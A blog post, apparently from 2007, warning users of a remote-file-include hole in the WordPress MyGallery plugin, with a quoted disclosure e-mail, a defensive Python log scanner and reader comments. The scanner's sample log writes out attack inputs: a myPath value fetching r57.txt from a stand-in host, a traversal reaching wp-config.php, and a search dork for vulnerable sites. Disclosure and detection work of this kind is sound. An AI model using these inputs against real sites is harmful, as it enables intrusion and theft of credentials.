MyGallery plugin–possible security issue?

EDIT: I highly recommend that any user remove this script until a fix can be made. The affected file that is being abused is /mygallerybrowser.php?. The creator of the plugin (page translated from German to English) posted an update today saying to upgrade to the latest version or deactivate the plugin.

Earlier today I received an e-mail from “WaLhEZ” as follows:

Hi, I visited your site and saw a problem: I have seen that you have a bug that allows someone ill-disposed to get into your host and cause damage, obtaining your FTP password, database, etc. The problem is in the mygallery plugin, specifically in the file mygallerybrowser.php. This is an example of how they can get into your server and hurt you, look: wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=(website)? I am reporting this to you so that it gets fixed. I discovered this bug myself, and I want to report it to you so that they don’t damage your blog, which by the way is very pretty. I await your answer… And pardon my English, it is not very good. Contact me and I’ll see how I can help you.

Upon receiving his e-mail, I didn’t know whether it was a hoax, since I knew I didn’t have the MyGallery plugin activated, though I did have it under my /plugins/ directory. But upon accessing it via the URL he had included in his e-mail, I was able to reach the file under that directory, though with some PHP errors. I then went ahead and chmod’d the files so that they couldn’t be accessed, and then deleted the plugin from my server since I’m not using it.

After deleting it I also went through my access logs and error logs but didn’t see much activity other than what matched his IP address and what matched my own, with regard to the access URL and the plugin directory. All day today, though, I’ve had a lot of hits coming from Google searches for “inurl:/mygallery/myfunctions” (without the quotes, and from various locales too, like es, it, co.ma, and com.tr). I’ve also had quite a few hits from a hacking forum, Tryag.com/CC (the link is a direct link to the thread). Unfortunately the only way to view what is on that forum is by registering, and I believe registration is turned off. I didn’t run it through a translator, but I figured that’s what the message was saying.
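The log review described above can be automated. The script below is an added example for this post, not code from the plugin’s author or from this blog: it parses Apache combined-format access-log lines and flags the three indicators mentioned here, a request to mygallerybrowser.php whose myPath parameter carries a remote URL (the form given in the quoted e-mail) or a directory-traversal string, hits whose referer is a search-engine query for the “inurl:/mygallery/myfunctions” dork, and hits referred from the forum host named above. The sample log lines, IP addresses, hostnames, timestamps and the exact forum path are constructed for the example; the plugin directory path is the one from the e-mail.

```python
"""Scan Apache combined-format access logs for probing of the MyGallery plugin.

Added example for this post (not the plugin author's or the blogger's code).
Flags:
  * requests to mygallerybrowser.php whose myPath parameter points at a
    remote URL (the remote-file-include vector) or traverses the filesystem,
  * hits referred by a search-engine query for the inurl: dork, and
  * hits referred from a watched forum host.
"""
import re
from urllib.parse import parse_qs, urlparse

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

PLUGIN_DIR = "/wp-content/plugins/mygallery/"   # path from the quoted e-mail
VULN_SCRIPT = "mygallerybrowser.php"
DORK = "inurl:/mygallery/myfunctions"
# tryag.com is the forum named in the post; the exact thread path is not known.
WATCHED_REFERER_HOSTS = ("tryag.com",)
# Anything with a URL scheme in myPath (http://, ftp://, ...) is an RFI attempt.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    path, _, query = entry["target"].partition("?")
    entry["path"] = path
    # keep_blank_values so an empty 'myPath=' probe is still visible
    entry["params"] = parse_qs(query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return a list of (tag, evidence) findings for one parsed log entry."""
    findings = []
    if entry["path"].startswith(PLUGIN_DIR):
        findings.append(("PLUGIN_HIT", entry["path"]))
    if entry["path"].endswith("/" + VULN_SCRIPT):
        for value in entry["params"].get("myPath", []):
            if SCHEME_RE.match(value):
                findings.append(("RFI_ATTEMPT", value))
            elif "../" in value or "\x00" in value:
                findings.append(("TRAVERSAL_ATTEMPT", value))
            else:
                findings.append(("MYPATH_PROBE", value))
    ref = entry["referer"]
    if ref and ref != "-":
        parsed = urlparse(ref)
        host = parsed.hostname or ""
        # search engines put the query in 'q'; parse_qs percent-decodes it
        query_terms = " ".join(parse_qs(parsed.query).get("q", []))
        if DORK in query_terms:
            findings.append(("DORK_REFERER", host))
        if any(host == w or host.endswith("." + w) for w in WATCHED_REFERER_HOSTS):
            findings.append(("FORUM_REFERER", ref))
    return findings


def scan(log_text):
    """Scan a whole log; return [(ip, target, findings)] for lines with findings."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry["ip"], entry["target"], findings))
    return hits


def summarize(hits):
    """Count findings by tag so a day's log can be triaged at a glance."""
    counts = {}
    for _, _, findings in hits:
        for tag, _ in findings:
            counts[tag] = counts.get(tag, 0) + 1
    return counts


# Constructed sample log: documentation-range IPs, invented hosts and timestamps.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2007:14:02:11 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://evil.example/r57.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Apr/2007:14:05:40 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php HTTP/1.1" 500 231 "http://www.google.es/search?q=inurl%3A%2Fmygallery%2Fmyfunctions" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2007:14:07:02 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php%00 HTTP/1.1" 200 4096 "-" "libwww-perl/5.805"
192.0.2.44 - - [10/Apr/2007:14:09:15 +0000] "GET /index.php HTTP/1.1" 200 8822 "-" "Mozilla/5.0"
203.0.113.77 - - [10/Apr/2007:14:11:38 +0000] "GET /wp-content/plugins/mygallery/ HTTP/1.1" 403 199 "http://www.tryag.com/cc/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip, target, findings in results:
        print(ip, target)
        for tag, evidence in findings:
            print("    ", tag, evidence)
    print(summarize(results))
```

Run it against a real access.log with `scan(open("access.log").read())`. The scheme check is the important one: the e-mail’s proof of concept is `myPath=` followed by a website, so any myPath value beginning with `http://`, `ftp://` or another scheme is an attempt to make the script include a remote file, and the IP that sent it is worth checking for follow-up requests to files it may have dropped.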

I’m going to look into this more, but if you’re using this plugin, definitely keep an eye out. If you know someone else who is using this plugin, feel free to link them to this entry. I’ll be updating it over the coming day(s) as I come across more information on the issue.

8 Comments

  1. Well, what is it: is the issue fixed or is it not fixed? “Should be” implies probability or expectation. So either you fixed the security issue, or it’s not fixed yet.

    Either way, I don’t plan on using this plugin.

  2. The issue *is* fixed. If you don’t plan to use the plugin, well then your blog entry is much ado about nothing 😉

  3. This sort of thing is scary! My last site got hacked by some Israeli or something! My host said it was my fault!

  4. [quote comment=”11233″]The issue *is* fixed. If you don’t plan to use the plugin, well then your blog entry is much ado about nothing ;-)[/quote]

    You’ve got to be fucking kidding me. Please don’t come here if you’ve got nothing constructive to say. This blog post is pretty important considering that there will be a vast number of users who are unaware that their plugin could cause their site to get hacked.

    Seriously, why don’t you take a look at the Google search link I provided in my entry, and then we’ll see if this blog entry is “much ado about nothing.” Until then, gfy.

  5. It is excellent on your part to report this bug to everyone. I wanted to report it to other webmasters too, but time was short and I only managed to tell you. It’s good that you have reported this problem, and by the way you have a very good blog. I had made a temporary patch for you, but apparently another version of the plugin is coming out that is far better. Another thing: the bug this plugin suffers from is called RFI = remote file include, meaning that through the vulnerability it has, one can get access to the host using a webshell, in this case r57 and c99. If you have any doubt, you know you can tell me and I will try to help you however I can. Greetings
    PS: one can see that you are very pretty

  6. Ahh, my mail is not a “hoax”. I sent it to you personally because I had seen the bug and, out of ethics, I reported it to you.
    PS: I still think that you are very pretty

Comments are closed.